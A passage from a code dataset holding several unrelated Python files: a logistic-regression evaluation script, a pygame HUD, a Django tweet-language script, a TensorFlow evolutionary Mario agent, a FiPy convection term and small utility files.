only\n\tlr_probs = lr_probs[:, 1]\n\t# calculate scores\n\tns_auc = roc_auc_score(testy, ns_probs)\n\tlr_auc = roc_auc_score(testy, lr_probs)\n\t# calculate roc curves\n\tns_fpr, ns_tpr, _ = roc_curve(testy, ns_probs)\n\tlr_fpr, lr_tpr, _ = roc_curve(testy, lr_probs)\n\t# plot the roc curve for the model\n\tpyplot.plot(ns_fpr, ns_tpr, linestyle='--', label='No Skill')\n\tpyplot.plot(lr_fpr, lr_tpr, marker='.', label='Logistic')\n\t# axis labels\n\tpyplot.xlabel('False Positive Rate')\n\tpyplot.ylabel('True Positive Rate')\n\t# show the legend\n\tpyplot.legend()\n\t# show the plot\n\tyhat = model.predict(testX)\n\tmse = mean_squared_error(testy, yhat)\n\taic = calculate_aic(testy.shape[0], mse, 1)\n\tbic = calculate_bic(testy.shape[0], mse, 1)\n\tlr_precision, lr_recall, _ = precision_recall_curve(testy, lr_probs)\n\tlr_f1, lr_auc = f1_score(testy, yhat), auc(lr_recall, lr_precision)\n\n\tpyplot.savefig(path+'/roc.png')\n\tpyplot.clf()\n\tsf_2(trainX, testX, trainy, testy, path)\n\n\ttestX = (testX - np.min(trainX) + 1e-5)/(np.max(trainX) - np.min(trainX) + 1e-5)\n\ttrainX = (trainX - np.min(trainX) + 1e-5)/(np.max(trainX) - np.min(trainX) + 1e-5)\n\t\n\tmodel = tf.keras.models.Sequential([tf.keras.layers.Dense(1, activation='sigmoid')])\n\tmodel.compile(optimizer='adam', 
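# (comment added for clarity, not in the original: one Dense unit with a sigmoid\n\t\t# and binary cross-entropy is logistic regression fit by gradient descent, so its\n\t\t# metrics should roughly track the sklearn LogisticRegression above)\n\t\t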
loss='binary_crossentropy', metrics=['accuracy'])\n\thistory = model.fit(trainX, trainy, epochs=n,verbose=0, validation_data=(testX, testy))\n\tstart = time.process_time()\n\t_, train_acc = model.evaluate(trainX, trainy, verbose=0)\n\t_, test_acc = model.evaluate(testX, testy, verbose=0)\n\ttime_taken = time.process_time() - start\n\n\tpredy = model.predict(trainX)\n\tresid = np.array([trainy[i] - predy[i] for i in range(trainy.shape[0])])\n\tll_fit = -np.sum(np.abs(resid))\n\tns_probs = [0 for _ in range(trainy.shape[0])]\n\tll_overall = -np.sum(np.array([trainy[i] - ns_probs[i] for i in range(trainy.shape[0])]))\n\tr2 = 1 - (ll_fit/ll_overall)\n\n\tpyplot.plot(history.history['accuracy'])\n\tpyplot.plot(history.history['val_accuracy'])\n\tpyplot.ylim([0, 1.1])\n\tpyplot.ylabel('accuracy')\n\tpyplot.xlabel('epoch')\n\tpyplot.legend(['accuracy', 'val_accuracy'], loc='lower right')\n\tpyplot.savefig(path+'/acc.png')\n\tpyplot.clf()\n\n\treturn ns_auc, lr_auc, lr_f1, train_acc, test_acc, mse, aic, bic, r2, time_taken/(trainX.shape[0]+testX.shape[0])\n\ndef sf_2(trainX, testX, trainy, testy, path):\n\tmodel = LogisticRegression(solver='lbfgs', max_iter=1e10)\n\tmodel.fit(trainX, trainy)\n\t# predict probabilities\n\tlr_probs = model.predict_proba(testX)\n\t# keep probabilities for the positive outcome only\n\tlr_probs = lr_probs[:, 1]\n\t# predict class values\n\tyhat = model.predict(testX)\n\tlr_precision, lr_recall, _ = precision_recall_curve(testy, lr_probs)\n\tlr_f1, lr_auc = f1_score(testy, yhat), auc(lr_recall, lr_precision)\n\t# summarize scores\n\t# plot the precision-recall curves\n\tno_skill = len(testy[testy==1]) / len(testy)\n\tpyplot.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')\n\tpyplot.plot(lr_recall, lr_precision, marker='.', label='Logistic')\n\t# axis labels\n\tpyplot.xlabel('Recall')\n\tpyplot.ylabel('Precision')\n\t# show the legend\n\tpyplot.legend()\n\t# show the plot\n\tpyplot.savefig(path+'/precision.png')\n\tpyplot.clf()","sub_path":"supervised_learning/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"308433360","text":"import pygame, pygame.gfxdraw, math\n\n#Gui and Hud of the player\n#Displays the hp and mp bar\n#Displays the command menu\n#Displays the minimap\n\ndef getRootFolder(retracts=1):\n #retracts is how many times it goes up the file path branch\n path = __file__\n if \"\\\\\" in path: #Checks if device uses '\\' or '/' to navigate folders\n key = \"\\\\\"\n else:\n key = \"/\"\n path = path.split(key)\n for i in range(retracts):\n path.pop()\n path = key.join(path)\n return path\n\ndef setPath(path, pathList):\n if \"\\\\\" in path: #Checks if device uses '\\' or '/' to navigate folders\n key = \"\\\\\"\n else:\n key = \"/\"\n path = path.split(key)\n for i in range(len(pathList)):\n path.append(pathList[i])\n path = key.join(path)\n return path\n\n\nclass display:\n def __init__(self, surface, dimensions, debug=False):\n self.debug = debug\n self.surface = surface\n self.width = dimensions[0]\n self.length = dimensions[1]\n path = getRootFolder(2)\n self.font = pygame.font.Font(setPath(path,[\"assets\",\"fonts\",\"ability_Font.ttf\"]), 18)\n self.font2 = pygame.font.Font(setPath(path,[\"assets\",\"fonts\",\"Kh2_Menu_Font.ttf\"]), 12)\n self.frame = pygame.image.load(setPath(path,[\"assets\",\"player\",\"command_menu\",\"unselected.png\"]))\n self.frame_selected = 
pygame.image.load(setPath(path,[\"assets\",\"player\",\"command_menu\",\"selected.png\"]))\n self.frame_reaction = pygame.image.load(setPath(path,[\"assets\",\"player\",\"command_menu\",\"frame_reaction.png\"]))\n self.toolTipAnimation = [\"\"]\n if self.debug == True:\n self.colour = (0,0,0)\n else:\n self.colour = (0,0,0)\n\n def renderCMenu(self, commands=[], cooldowns=[], selected=0):\n x = 0\n y = self.length - 150\n \n #Load sprites\n \"Command title\"\n text = self.font2.render(\"COMMAND\", True, (220,80,130))\n sprite = pygame.Rect(x+14, y-24, 119, 29)\n location = text.get_rect()\n location.topleft = sprite.topleft\n self.surface.blit(text, location)\n for i in range (0, 4):\n if i != selected:\n self.surface.blit(self.frame, (x, y+34*i))\n image = self.frame_selected\n self.surface.blit(image, (x, y+34*selected))\n \n #Load text and cooldowns\n for i in range(len(commands)):\n if i < 4:\n if i != selected:\n sprite = pygame.Rect(x+25, y+34*i+10, 119, 29)\n colour = (170,170,170)\n cooldownSprite = pygame.Rect(x, y+34*i, 144, 42)\n else:\n sprite = pygame.Rect(x+40, y+34*i+10, 119, 29)\n colour = (255,255,255)\n cooldownSprite = pygame.Rect(x+12, y+34*i, 144, 42)\n text = self.font.render(commands[i], True, colour)\n location = text.get_rect()\n location.topleft = sprite.topleft\n self.surface.blit(text, location)\n \n def renderHud(self, miniMapData, hudData):\n #Interact box\n toolTip = hudData[2]\n if toolTip != self.toolTipAnimation[0]:\n self.toolTipAnimation = [toolTip,5]\n if toolTip != \"\":\n x = self.toolTipAnimation[1]\n self.surface.blit(self.frame_reaction, (x,self.length-220))\n if x == 15:\n toolTip = self.font.render(toolTip, True, (250,250,250))\n toolTipRect = toolTip.get_rect()\n toolTipRect.topleft = (x+19, self.length-205)\n self.surface.blit(toolTip, toolTipRect)\n if self.toolTipAnimation[1] < 15:\n self.toolTipAnimation[1] += 2\n if self.toolTipAnimation[1] >= 15:\n self.toolTipAnimation[1] = 15\n \n #Mana bar\n points,colour = self.calculateManaBar(hudData[1])\n pygame.draw.polygon(self.surface, (21,56,81), points[1]) #Background \n pygame.draw.polygon(self.surface, colour, points[0]) #Mana\n if self.debug == True:\n pygame.draw.lines(self.surface, self.colour, True, points[1], 2) #Frame\n \n #Health bar\n points,colour = self.calculateHealthBar(hudData[0])\n pygame.draw.polygon(self.surface, colour, points[0]) #Hp\n pygame.draw.lines(self.surface, self.colour, True, points[1], 2) #Frame\n\n #Mini Map\n miniMapRect = (self.width-174,30,144,144)\n borderWidth = 3\n clipRect = (miniMapRect[0]+borderWidth, miniMapRect[1]+borderWidth, miniMapRect[2]-borderWidth*2, miniMapRect[3]-borderWidth*2)\n xConstant = (miniMapRect[0]*2 + miniMapRect[2])/2\n yConstant = (miniMapRect[1]*2 + miniMapRect[3])/2\n pygame.draw.rect(self.surface, self.colour, miniMapRect, borderWidth)\n self.surface.set_clip(clipRect)\n #Dimensions of the map\n mapScale = 72/1500\n #Size of icons on the map\n sizeScale = 72/600\n enemies = (\"triangle\", \"square\")\n allies = (\"npc\", \"location\", \"player\")\n for i in range(len(miniMapData)):\n size = miniMapData[i][2]*sizeScale\n x = (-1*miniMapData[i][1][0]) * mapScale + xConstant - size/2\n y = (-1*miniMapData[i][1][1]) * mapScale + yConstant - size/2\n if miniMapData[i][0] in enemies:\n colour = (250,50,50)\n pygame.draw.rect(self.surface, colour, (x, y, size, size))\n \n elif miniMapData[i][0] in allies: \n if miniMapData[i][0] == \"location\":\n colour = miniMapData[i][3]\n pygame.draw.rect(self.surface, colour, (x, y, size, size), 
2)\n x += size/2\n y += size/2\n radius = round(miniMapData[i][2] * 5 * mapScale)\n pygame.gfxdraw.aacircle(self.surface, round(x), round(y), radius-1, colour) #Draw zone range\n pygame.gfxdraw.aacircle(self.surface, round(x), round(y), radius, colour) #Make zone thicker\n\n else:\n colour = (50,250,50)\n if miniMapData[i][0] == \"player\":\n pygame.draw.rect(self.surface, (0,0,0), (x-2, y-2, size+4, size+4))\n if miniMapData[i][0] == \"npc\":\n colour = (50,250,50)\n pygame.draw.rect(self.surface, colour, (x, y, size, size))\n else: #Temporary online player\n colour = (50,250,50)\n #pygame.draw.rect(self.surface, (0,0,0), (x-2, y-2, size+4, size+4))\n #pygame.draw.rect(self.surface, colour, (x, y, size, size))\n \n #The player\n pygame.draw.rect(self.surface, self.colour, (xConstant-2.5, yConstant-2.5, 5,5))\n self.surface.set_clip()\n\n def calculateHealthBar(self, hpStats):\n percentage = hpStats[0]/hpStats[1]\n colour = (63,237,47)\n #HP bar, Frame\n points = [((self.width-20-170*percentage,self.length-68), (self.width-20,self.length-68), (self.width-20,self.length-38), (self.width-20-200*percentage,self.length-38)),\n ((self.width-190,self.length-68), (self.width-20,self.length-68), (self.width-20,self.length-38), (self.width-220,self.length-38))]\n return points, colour\n\n def calculateManaBar(self, mpStats):\n percentage = mpStats[0]/mpStats[1]\n if percentage > 0:\n colour =(66,167,244)\n else:\n percentage = abs(percentage)\n colour = (242,87,162)\n points = [((self.width-20-180*percentage,self.length-83), (self.width-20,self.length-83), (self.width-20,self.length-74), (self.width-20-170*percentage,self.length-74)),\n ((self.width-220,self.length-43), (self.width-200,self.length-83),\n (self.width-20,self.length-83), (self.width-20,self.length-73), (self.width-190,self.length-73))]\n return points, colour\n \n def update(self, commands=[], cooldowns=[], selected=0, miniMapData=[], hudData=((100,100),(100,100),\"test\")): #hudData = hp and mp\n self.renderCMenu(commands, cooldowns, selected)\n self.renderHud(miniMapData, hudData)\n \n","sub_path":"lib/LIMITinterface.py","file_name":"LIMITinterface.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159686259","text":"from django.db.models import Q\nfrom googletrans import Translator\nfrom delab.models import Tweet\n\n\ndef run():\n tweets = Tweet.objects.filter(Q(language=\"unk\")).all()\n translator = Translator()\n for tweet in tweets:\n detected = translator.detect(tweet.text)\n print(\"dectted lang {}\".format(detected.lang))\n tweet.language = detected.lang\n tweet.save(update_fields=[\"language\"])\n","sub_path":"scripts/update_lang_conversation_tweets.py","file_name":"update_lang_conversation_tweets.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23361685","text":"import numpy as np\nimport math as m\nimport os, random\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport tensorflow as tf\nfrom gym_super_mario_bros.actions import COMPLEX_MOVEMENT as POSSIBLE_ACTIONS\nfrom Optimizers import Adam\n\n# NES\nH_size = 150\nF_size = 3\nNF1_out = 4\nNF2_out = 8\nNF3_out = 12\nNF4_out = 16\nNF5_out = 32\nNF6_out = 64\nz_size = 726\nY_size = len(POSSIBLE_ACTIONS)\n\n# GA\nPASS_THROUGH = 10\n\ndef var(x):\n return tf.Variable(x, trainable=False)\n\nclass Param:\n def __init__(self, initial_mean, population_size, sigma):\n self.population_size 
= population_size\n self.mean = var(initial_mean)\n self.population = []\n\n # during visualization we use the initial_mean as the only parameters in the population\n if population_size == 1:\n self.population = [self.mean]\n\n # initialize population\n for _ in range(self.population_size//2):\n jitter = tf.random.normal(self.mean.shape, stddev=sigma)\n self.population.append(jitter + self.mean)\n self.population.append(self.mean - jitter)\n\n self.set_current_population_member(0)\n\n # change reference to current tensor\n def set_current_population_member(self, i):\n self.current = self.population[i]\n\n def get_grad(self, reward):\n jitter = self.population[0] - self.mean\n grad = jitter * reward[0]\n for i in range(1,self.population_size):\n jitter = self.population[i] - self.mean\n grad += jitter * reward[i]\n return grad\n\n def gen_pop_about_mean(self, sigma):\n for i in range(self.population_size//2):\n jitter = tf.random.normal(self.mean.shape, stddev=sigma)\n self.population[2*i+0] = jitter + self.mean\n self.population[2*i+1] = self.mean - jitter\n\nclass Parameters:\n def __init__(self, population_size=1, sigma=0, alpha=0, filename=''):\n self.population_size = population_size\n self.sigma = sigma\n self.alpha = alpha\n self.optimizer = Adam()\n\n if filename:\n npz = np.load(filename)\n self.F1 = Param(npz['arr_0'], population_size, sigma)\n self.F2 = Param(npz['arr_1'], population_size, sigma)\n self.F3 = Param(npz['arr_2'], population_size, sigma)\n self.F4 = Param(npz['arr_3'], population_size, sigma)\n self.F5 = Param(npz['arr_4'], population_size, sigma)\n self.F6 = Param(npz['arr_5'], population_size, sigma)\n\n self.g3 = Param(npz['arr_6'], population_size, sigma)\n self.b3 = Param(npz['arr_7'], population_size, sigma)\n self.g4 = Param(npz['arr_8'], population_size, sigma)\n self.b4 = Param(npz['arr_9'], population_size, sigma)\n self.g5 = Param(npz['arr_10'], population_size, sigma)\n self.b5 = Param(npz['arr_11'], population_size, sigma)\n self.g6 = Param(npz['arr_12'], population_size, sigma)\n self.b6 = Param(npz['arr_13'], population_size, sigma)\n\n self.Wx0 = Param(npz['arr_14'], population_size, sigma)\n self.bx0 = Param(npz['arr_15'], population_size, sigma)\n self.Wx1 = Param(npz['arr_16'], population_size, sigma)\n self.bx1 = Param(npz['arr_17'], population_size, sigma)\n self.Wx2 = Param(npz['arr_18'], population_size, sigma)\n self.bx2 = Param(npz['arr_19'], population_size, sigma)\n self.Wv = Param(npz['arr_20'], population_size, sigma)\n self.bv = Param(npz['arr_21'], population_size, sigma)\n\n self.lg0 = Param(npz['arr_22'], population_size, sigma)\n self.lb0 = Param(npz['arr_23'], population_size, sigma)\n self.lg1 = Param(npz['arr_24'], population_size, sigma)\n self.lb1 = Param(npz['arr_25'], population_size, sigma)\n self.lg2 = Param(npz['arr_26'], population_size, sigma)\n self.lb2 = Param(npz['arr_27'], population_size, sigma)\n else:\n # filter weight is whdo\n # w = width\n # h = height\n # d = depth (in channels)\n # o = out depth (out channels)?\n self.F1 = Param(tf.random.normal([F_size,F_size,3,NF1_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.F2 = Param(tf.random.normal([F_size,F_size,NF1_out,NF2_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.F3 = Param(tf.random.normal([F_size,F_size,NF2_out,NF3_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g3 = Param(tf.ones((NF3_out,1)), population_size, sigma)\n self.b3 = Param(tf.zeros((NF3_out,1)), population_size, sigma)\n self.F4 = 
Param(tf.random.normal([F_size,F_size,NF3_out,NF4_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g4 = Param(tf.ones((NF4_out,1)), population_size, sigma)\n self.b4 = Param(tf.zeros((NF4_out,1)), population_size, sigma)\n self.F5 = Param(tf.random.normal([F_size,F_size,NF4_out,NF5_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g5 = Param(tf.ones((NF5_out,1)), population_size, sigma)\n self.b5 = Param(tf.zeros((NF5_out,1)), population_size, sigma)\n self.F6 = Param(tf.random.normal([F_size,F_size,NF5_out,NF6_out], stddev=m.sqrt(2/F_size)), population_size, sigma)\n self.g6 = Param(tf.ones((NF6_out,1)), population_size, sigma)\n self.b6 = Param(tf.zeros((NF6_out,1)), population_size, sigma)\n\n self.lg0 = Param(tf.ones((H_size,1)), population_size, sigma)\n self.lb0 = Param(tf.zeros((H_size,1)), population_size, sigma)\n self.lg1 = Param(tf.ones((H_size,1)), population_size, sigma)\n self.lb1 = Param(tf.zeros((H_size,1)), population_size, sigma)\n self.lg2 = Param(tf.ones((H_size,1)), population_size, sigma)\n self.lb2 = Param(tf.zeros((H_size,1)), population_size, sigma)\n\n self.Wx0 = Param(tf.random.normal([H_size * 4, z_size]), population_size, sigma)\n self.bx0 = Param(tf.zeros([H_size * 4, 1]), population_size, sigma)\n self.Wx1 = Param(tf.random.normal([H_size * 4, H_size*2]), population_size, sigma)\n self.bx1 = Param(tf.zeros([H_size * 4, 1]), population_size, sigma)\n self.Wx2 = Param(tf.random.normal([H_size * 4, H_size*2]), population_size, sigma)\n self.bx2 = Param(tf.zeros([H_size * 4, 1]), population_size, sigma)\n self.Wv = Param(tf.random.normal([Y_size, H_size]), population_size, sigma)\n self.bv = Param(tf.zeros([Y_size, 1]), population_size, sigma)\n\n def all(self):\n return [self.F1, self.F2, self.F3, self.F4, self.F5, self.F6,\\\n self.g3, self.b3, self.g4, self.b4, self.g5, self.b5, self.g6, self.b6,\\\n self.Wx0, self.bx0, self.Wx1, self.bx1, self.Wx2, self.bx2,\\\n self.Wv, self.bv,\\\n self.lg0,self.lb0,self.lg1,self.lb1,self.lg2,self.lb2]\n\n # return reference to current tensors\n def current(self):\n return [param.current for param in self.all()]\n\n def set_current_population_member(self, i):\n for param in self.all():\n param.set_current_population_member(i)\n\n def update_nes(self, reward, reward_mean, reward_std):\n reward = (reward-reward_mean)/(reward_std+.00001)\n grads = []\n means = []\n for param in self.all():\n grads += [param.get_grad(reward) * (self.alpha / (self.population_size*self.sigma))]\n means += [param.mean]\n self.optimizer.update(means, grads)\n for param in self.all():\n param.gen_pop_about_mean(self.sigma)\n\n def mutate(self, param, i):\n x = param.population[i]\n if random.randint(1,4) == 1:\n jitter = tf.random.normal(x.shape, stddev=self.sigma)\n return x + jitter\n else:\n return x\n\n def mate(self, param, i, j):\n if random.randint(1,4) == 1:\n return self.mutate(param, i)\n else:\n return self.mutate(param, j)\n\n def update_ga(self, rewards):\n # sort parameters by rewards\n top_reward_indices = rewards.argsort()[-PASS_THROUGH:]\n top_reward_indices = top_reward_indices[::-1]\n for param in self.all():\n # sort population\n for i,j in enumerate(top_reward_indices):\n param.population[i] = param.population[j]\n # generate new population\n for k in range(PASS_THROUGH,self.population_size):\n param.population[k] = self.mate(param, random.randint(0,9), random.randint(0,9))\n\n# For visualization\nimport viridis\ncmap = viridis.Viridis().getmap()\ndef post_process_activations(a):\n for i in 
range(len(a)):\n a[i] = tf.image.resize(a[i], (256,256), method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n for i in range(len(a)):\n mx = tf.reduce_max(a[i])\n mn = tf.reduce_min(a[i])\n a[i]=tf.cast(255.*(a[i]-mn)/(mx-mn+.00001), tf.int32)\n for i in range(len(a)):\n a[i]=255.*tf.gather(params=cmap,indices=a[i])[:,:,0,:]\n return a\n\ndef gnorm(x, gamma, beta, G, eps=1e-5):\n N, H, W, C = x.get_shape().as_list()\n G = min(G, C)\n x = tf.reshape(x, [N, H, W, G, C // G])\n mean, var = tf.nn.moments(x, [1, 2, 4], keepdims=True)\n x = (x - mean) / tf.sqrt(var + eps)\n gamma = tf.reshape(gamma,[1,1,1,C])\n beta = tf.reshape(beta,[1,1,1,C])\n x = tf.reshape(x, [N, H, W, C]) * gamma + beta\n return x\n\ndef lnorm(x, gamma, beta, eps=1e-5):\n mean, var = tf.nn.moments(x,[0],keepdims=True)\n x=(x-mean)/tf.sqrt(var+eps)\n return x * gamma + beta\n\ndef conv(x,F,S):\n x = tf.nn.conv2d(x, F, strides=[1,1,1,1], padding='VALID')\n print('x:',x.shape)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x,2,(1,1),padding='VALID')\n S=S//2\n x = tf.image.resize(x, (S,S))\n print('x:',x.shape)\n return x, S\n\ndef lstm(x,h,c,W,b,lg,lb):\n hx = tf.concat((x,h), axis=0)\n print('hx:',hx.shape)\n z = tf.matmul(W, hx) + b\n print('z:',z.shape)\n i, f, o, cp = tf.split(z, axis=0, num_or_size_splits=4)\n print('i:{}\\nf:{}\\no:{}\\ncp:{}'.format(i.shape,f.shape,o.shape,cp.shape))\n i = tf.nn.sigmoid(lnorm(i,lg,lb))\n f = tf.nn.sigmoid(lnorm(f,lg,lb))\n o = tf.nn.sigmoid(lnorm(o,lg,lb))\n c = lnorm(f * c + i * tf.nn.tanh(lnorm(cp,lg,lb)),lg,lb)\n h = o * tf.nn.tanh(c)\n return h, c\n\n# see tf.function docs section 'When to retrace?'\n@tf.function\ndef forward(observation,\\\n h0,c0,\\\n h1,c1,\\\n h2,c2,\\\n F1,F2,F3,\\\n F4,F5,F6,\\\n g3,b3,\\\n g4,b4,\\\n g5,b5,\\\n g6,b6,\\\n Wx0,bx0,\\\n Wx1,bx1,\\\n Wx2,bx2,\\\n Wv,bv,\\\n lg0,lb0,\\\n lg1,lb1,\\\n lg2,lb2,\n visualize=False):\n\n print('inputs:',observation)\n x = observation[35:215,38:256-38]/255.\n print('x:',x.shape)\n S,_,_ = x.shape\n\n activations = [None]*31\n\n x,S = conv([x],F1,S)\n x,S = conv(x,F2,S)\n if visualize:\n activations[0] = x[0,:,:,0][:,:,None]\n activations[1] = x[0,:,:,3][:,:,None]\n activations[2] = x[0,:,:,4][:,:,None]\n activations[3] = x[0,:,:,5][:,:,None]\n x,S = conv(x,F3,S)\n x = gnorm(x,g3,b3,G=4)\n if visualize:\n activations[4] = x[0,:,:,0][:,:,None]\n activations[5] = x[0,:,:,1][:,:,None]\n activations[6] = x[0,:,:,2][:,:,None]\n activations[7] = x[0,:,:,3][:,:,None]\n activations[8] = x[0,:,:,4][:,:,None]\n activations[9] = x[0,:,:,5][:,:,None]\n activations[10] = x[0,:,:,6][:,:,None]\n activations[11] = x[0,:,:,7][:,:,None]\n activations[12] = x[0,:,:,8][:,:,None]\n activations[13] = x[0,:,:,9][:,:,None]\n activations[14] = x[0,:,:,10][:,:,None]\n activations[15] = x[0,:,:,11][:,:,None]\n x,S = conv(x,F4,S)\n x = gnorm(x,g4,b4,G=4)\n if visualize:\n activations[16] = x[0,:,:,0][:,:,None]\n activations[17] = x[0,:,:,1][:,:,None]\n activations[18] = x[0,:,:,2][:,:,None]\n activations[19] = x[0,:,:,3][:,:,None]\n activations[20] = x[0,:,:,4][:,:,None]\n activations[21] = x[0,:,:,5][:,:,None]\n activations[22] = x[0,:,:,6][:,:,None]\n activations[23] = x[0,:,:,7][:,:,None]\n activations[24] = x[0,:,:,8][:,:,None]\n activations[25] = x[0,:,:,9][:,:,None]\n activations[26] = x[0,:,:,10][:,:,None]\n x,S = conv(x,F5,S)\n x = gnorm(x,g5,b5,G=8)\n x = tf.nn.conv2d(x, F6, strides=[1,1,1,1], padding='VALID')\n x = gnorm(x,g6,b6,G=16)\n if visualize:\n activations[27] = x[0,:,:,0][:,:,None]\n activations[28] = x[0,:,:,1][:,:,None]\n 
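# (note added; my reading of the shapes, not the author's comment) the crop is 180x180\n # and the conv/pool/resize chain ends at 3x3x64, i.e. 576 values; lstm() concatenates\n # the 150-long hidden state onto it, which is where z_size = 726 for Wx0 comes from.\n 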
print('x:',x.shape)\n x = tf.nn.relu(x)\n\n x = tf.reshape(x, [-1, 1]) # flatten\n print('x:',x.shape)\n\n h0,c0 = lstm(x,h0,c0,Wx0,bx0,lg0,lb0)\n h1,c1 = lstm(h0,h1,c1,Wx1,bx1,lg1,lb1)\n h2,c2 = lstm(h1,h2,c2,Wx2,bx2,lg2,lb2)\n a = tf.matmul(Wv, h2) + bv\n\n a = tf.argmax(a)\n\n if visualize:\n activations[29] = tf.reshape(tf.concat((h0,h1,h2),axis=0)[:289], (17,17))[:,:,None]\n activations[30] = tf.reshape(tf.concat((c0,c1,c2),axis=0)[:289], (17,17))[:,:,None]\n activations = post_process_activations(activations)\n observation = tf.image.resize(observation, (256,256), method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n return h0,c0,h1,c1,h2,c2,a,activations+[observation],\n else:\n return h0,c0,h1,c1,h2,c2,a\n\nclass Model:\n def __init__(self, population_size, observation, params, visualize=False):\n # TODO what is 6 here? (2 vectors for each lstm layer (have 3 lstm layers))\n self.population_size = population_size\n self.rnn_states = [[tf.zeros((H_size,1)) for _ in range(6)] for _ in range(population_size)]\n self.params = params\n\n # forward once just to compile the graph\n forward(observation, *(self.rnn_states[0]), *params.current(), visualize)\n\n # whether to store activations for visualization\n self.visualize = visualize\n\n def __call__(self, observation, env_id):\n self.params.set_current_population_member(env_id)\n if self.visualize:\n *self.rnn_states[env_id], action, activations = forward(observation, *self.rnn_states[env_id], *self.params.current(), visualize=True)\n return action.numpy()[0], activations\n else:\n *self.rnn_states[env_id], action = forward(observation, *self.rnn_states[env_id], *self.params.current())\n return action.numpy()[0]\n\n def reset_rnn_states(self):\n self.rnn_states = [[tf.zeros((H_size,1)) for _ in range(6)] for _ in range(self.population_size)]\n\n\n\n\n\n# def gnorm(x, gamma, beta, G, eps=1e-5):\n# # normalize\n# # transpose: [bs, h, w, c] to [bs, c, h, w] folloing the paper\n# x = tf.transpose(x, [0,3,1,2])\n# N,C,H,W=x.shape\n# G=min(G,C)\n# x=tf.reshape(x,[-1,G,C//G,H,W])\n# mean, var = tf.nn.moments(x,[2,3,4],keepdims=True)\n# x=(x-mean)/tf.sqrt(var+eps)\n# # per channel gamma and beta\n# gamma = tf.reshape(gamma,[1,C,1,1])\n# beta = tf.reshape(beta,[1,C,1,1])\n# output = tf.reshape(x,[-1,C,H,W]) * gamma + beta\n# return tf.transpose(output, [0,2,3,1])\n\n\n\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":15251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444017498","text":"#!/usr/bin/env python\n\n## -*-Pyth-*-\n # ###################################################################\n # FiPy - Python-based finite volume PDE solver\n # \n # FILE: \"baseUpwindConvectionTerm.py\"\n #\n # Author: Jonathan Guyer \n # mail: NIST\n # www: http://www.ctcms.nist.gov/fipy/\n # \n # ========================================================================\n # This software was developed at the National Institute of Standards\n # and Technology by employees of the Federal Government in the course\n # of their official duties. Pursuant to title 17 Section 105 of the\n # United States Code this software is not subject to copyright\n # protection and is in the public domain. FiPy is an experimental\n # system. NIST assumes no responsibility whatsoever for its use by\n # other parties, and makes no guarantees, expressed or implied, about\n # its quality, reliability, or any other characteristic. 
We would\n # appreciate acknowledgement if the software is used.\n # \n # This software can be redistributed and/or modified freely\n # provided that any derivative works bear some notice that they are\n # derived from it, and any modified versions bear some notice that\n # they have been modified.\n # ========================================================================\n # See the file \"license.terms\" for information on usage and redistribution\n # of this file, and for a DISCLAIMER OF ALL WARRANTIES.\n # \n # ###################################################################\n ##\n\n__docformat__ = 'restructuredtext'\n\n__all__ = []\n\nfrom fipy.terms.abstractConvectionTerm import _AbstractConvectionTerm\nfrom fipy.variables.faceVariable import FaceVariable\nfrom fipy.tools.dimensions.physicalField import PhysicalField\nfrom fipy.tools import inline\nfrom fipy.tools import numerix\n\nclass _UpwindConvectionTermAlpha(FaceVariable):\n def __init__(self, P):\n FaceVariable.__init__(self, mesh=P.mesh, elementshape=P.shape[:-1])\n self.P = self._requires(P)\n\n if inline.doInline:\n def _calcValue(self):\n P = self.P.numericValue\n alpha = self._array.copy()\n\n inline._runInline(\"\"\"\n alpha[i] = 0.5;\n\n if (P[i] > 0.) {\n alpha[i] = 1.;\n } else {\n alpha[i] = 0.;\n }\n \"\"\",\n alpha=alpha, P=P,\n ni = len(P.flat))\n\n return self._makeValue(value=alpha)\n else:\n def _calcValue(self):\n P = self.P.numericValue\n alpha = numerix.where(P > 0., 1., 0.)\n return PhysicalField(value=alpha)\n\nclass _AbstractUpwindConvectionTerm(_AbstractConvectionTerm):\n def _alpha(self, P):\n return _UpwindConvectionTermAlpha(P)\n\ndef _test(): \n import fipy.tests.doctestPlus\n return fipy.tests.doctestPlus.testmod()\n \nif __name__ == \"__main__\": \n _test() \n","sub_path":"Class Project/FiPy-3.1.3 2/fipy/terms/abstractUpwindConvectionTerm.py","file_name":"abstractUpwindConvectionTerm.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518410815","text":"# encoding: utf-8\n\n\nclass BaseModel(object):\n\n def serialize(self, allow_none=False):\n def serialize_func(obj):\n if isinstance(obj, BaseModel):\n ret = {}\n for k, v in vars(obj).items():\n r = serialize_func(v)\n if allow_none or r is not None:\n ret[k] = r\n return ret\n elif isinstance(obj, list):\n return [serialize_func(o) for o in obj if allow_none or serialize_func(o) is not None]\n else:\n return obj.decode('utf-8') if isinstance(obj, bytes) else obj\n return serialize_func(self)\n\n","sub_path":"aixiaotong/common/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"70141223","text":"\"\"\"Nox sessions.\"\"\"\n\nfrom nox_poetry import Session, session\n\nPYTHON_VERSIONS = \"3.8\", \"3.9\"\n\n\n@session(python=PYTHON_VERSIONS)\ndef tests(session: Session) -> None:\n session.install(\".\")\n 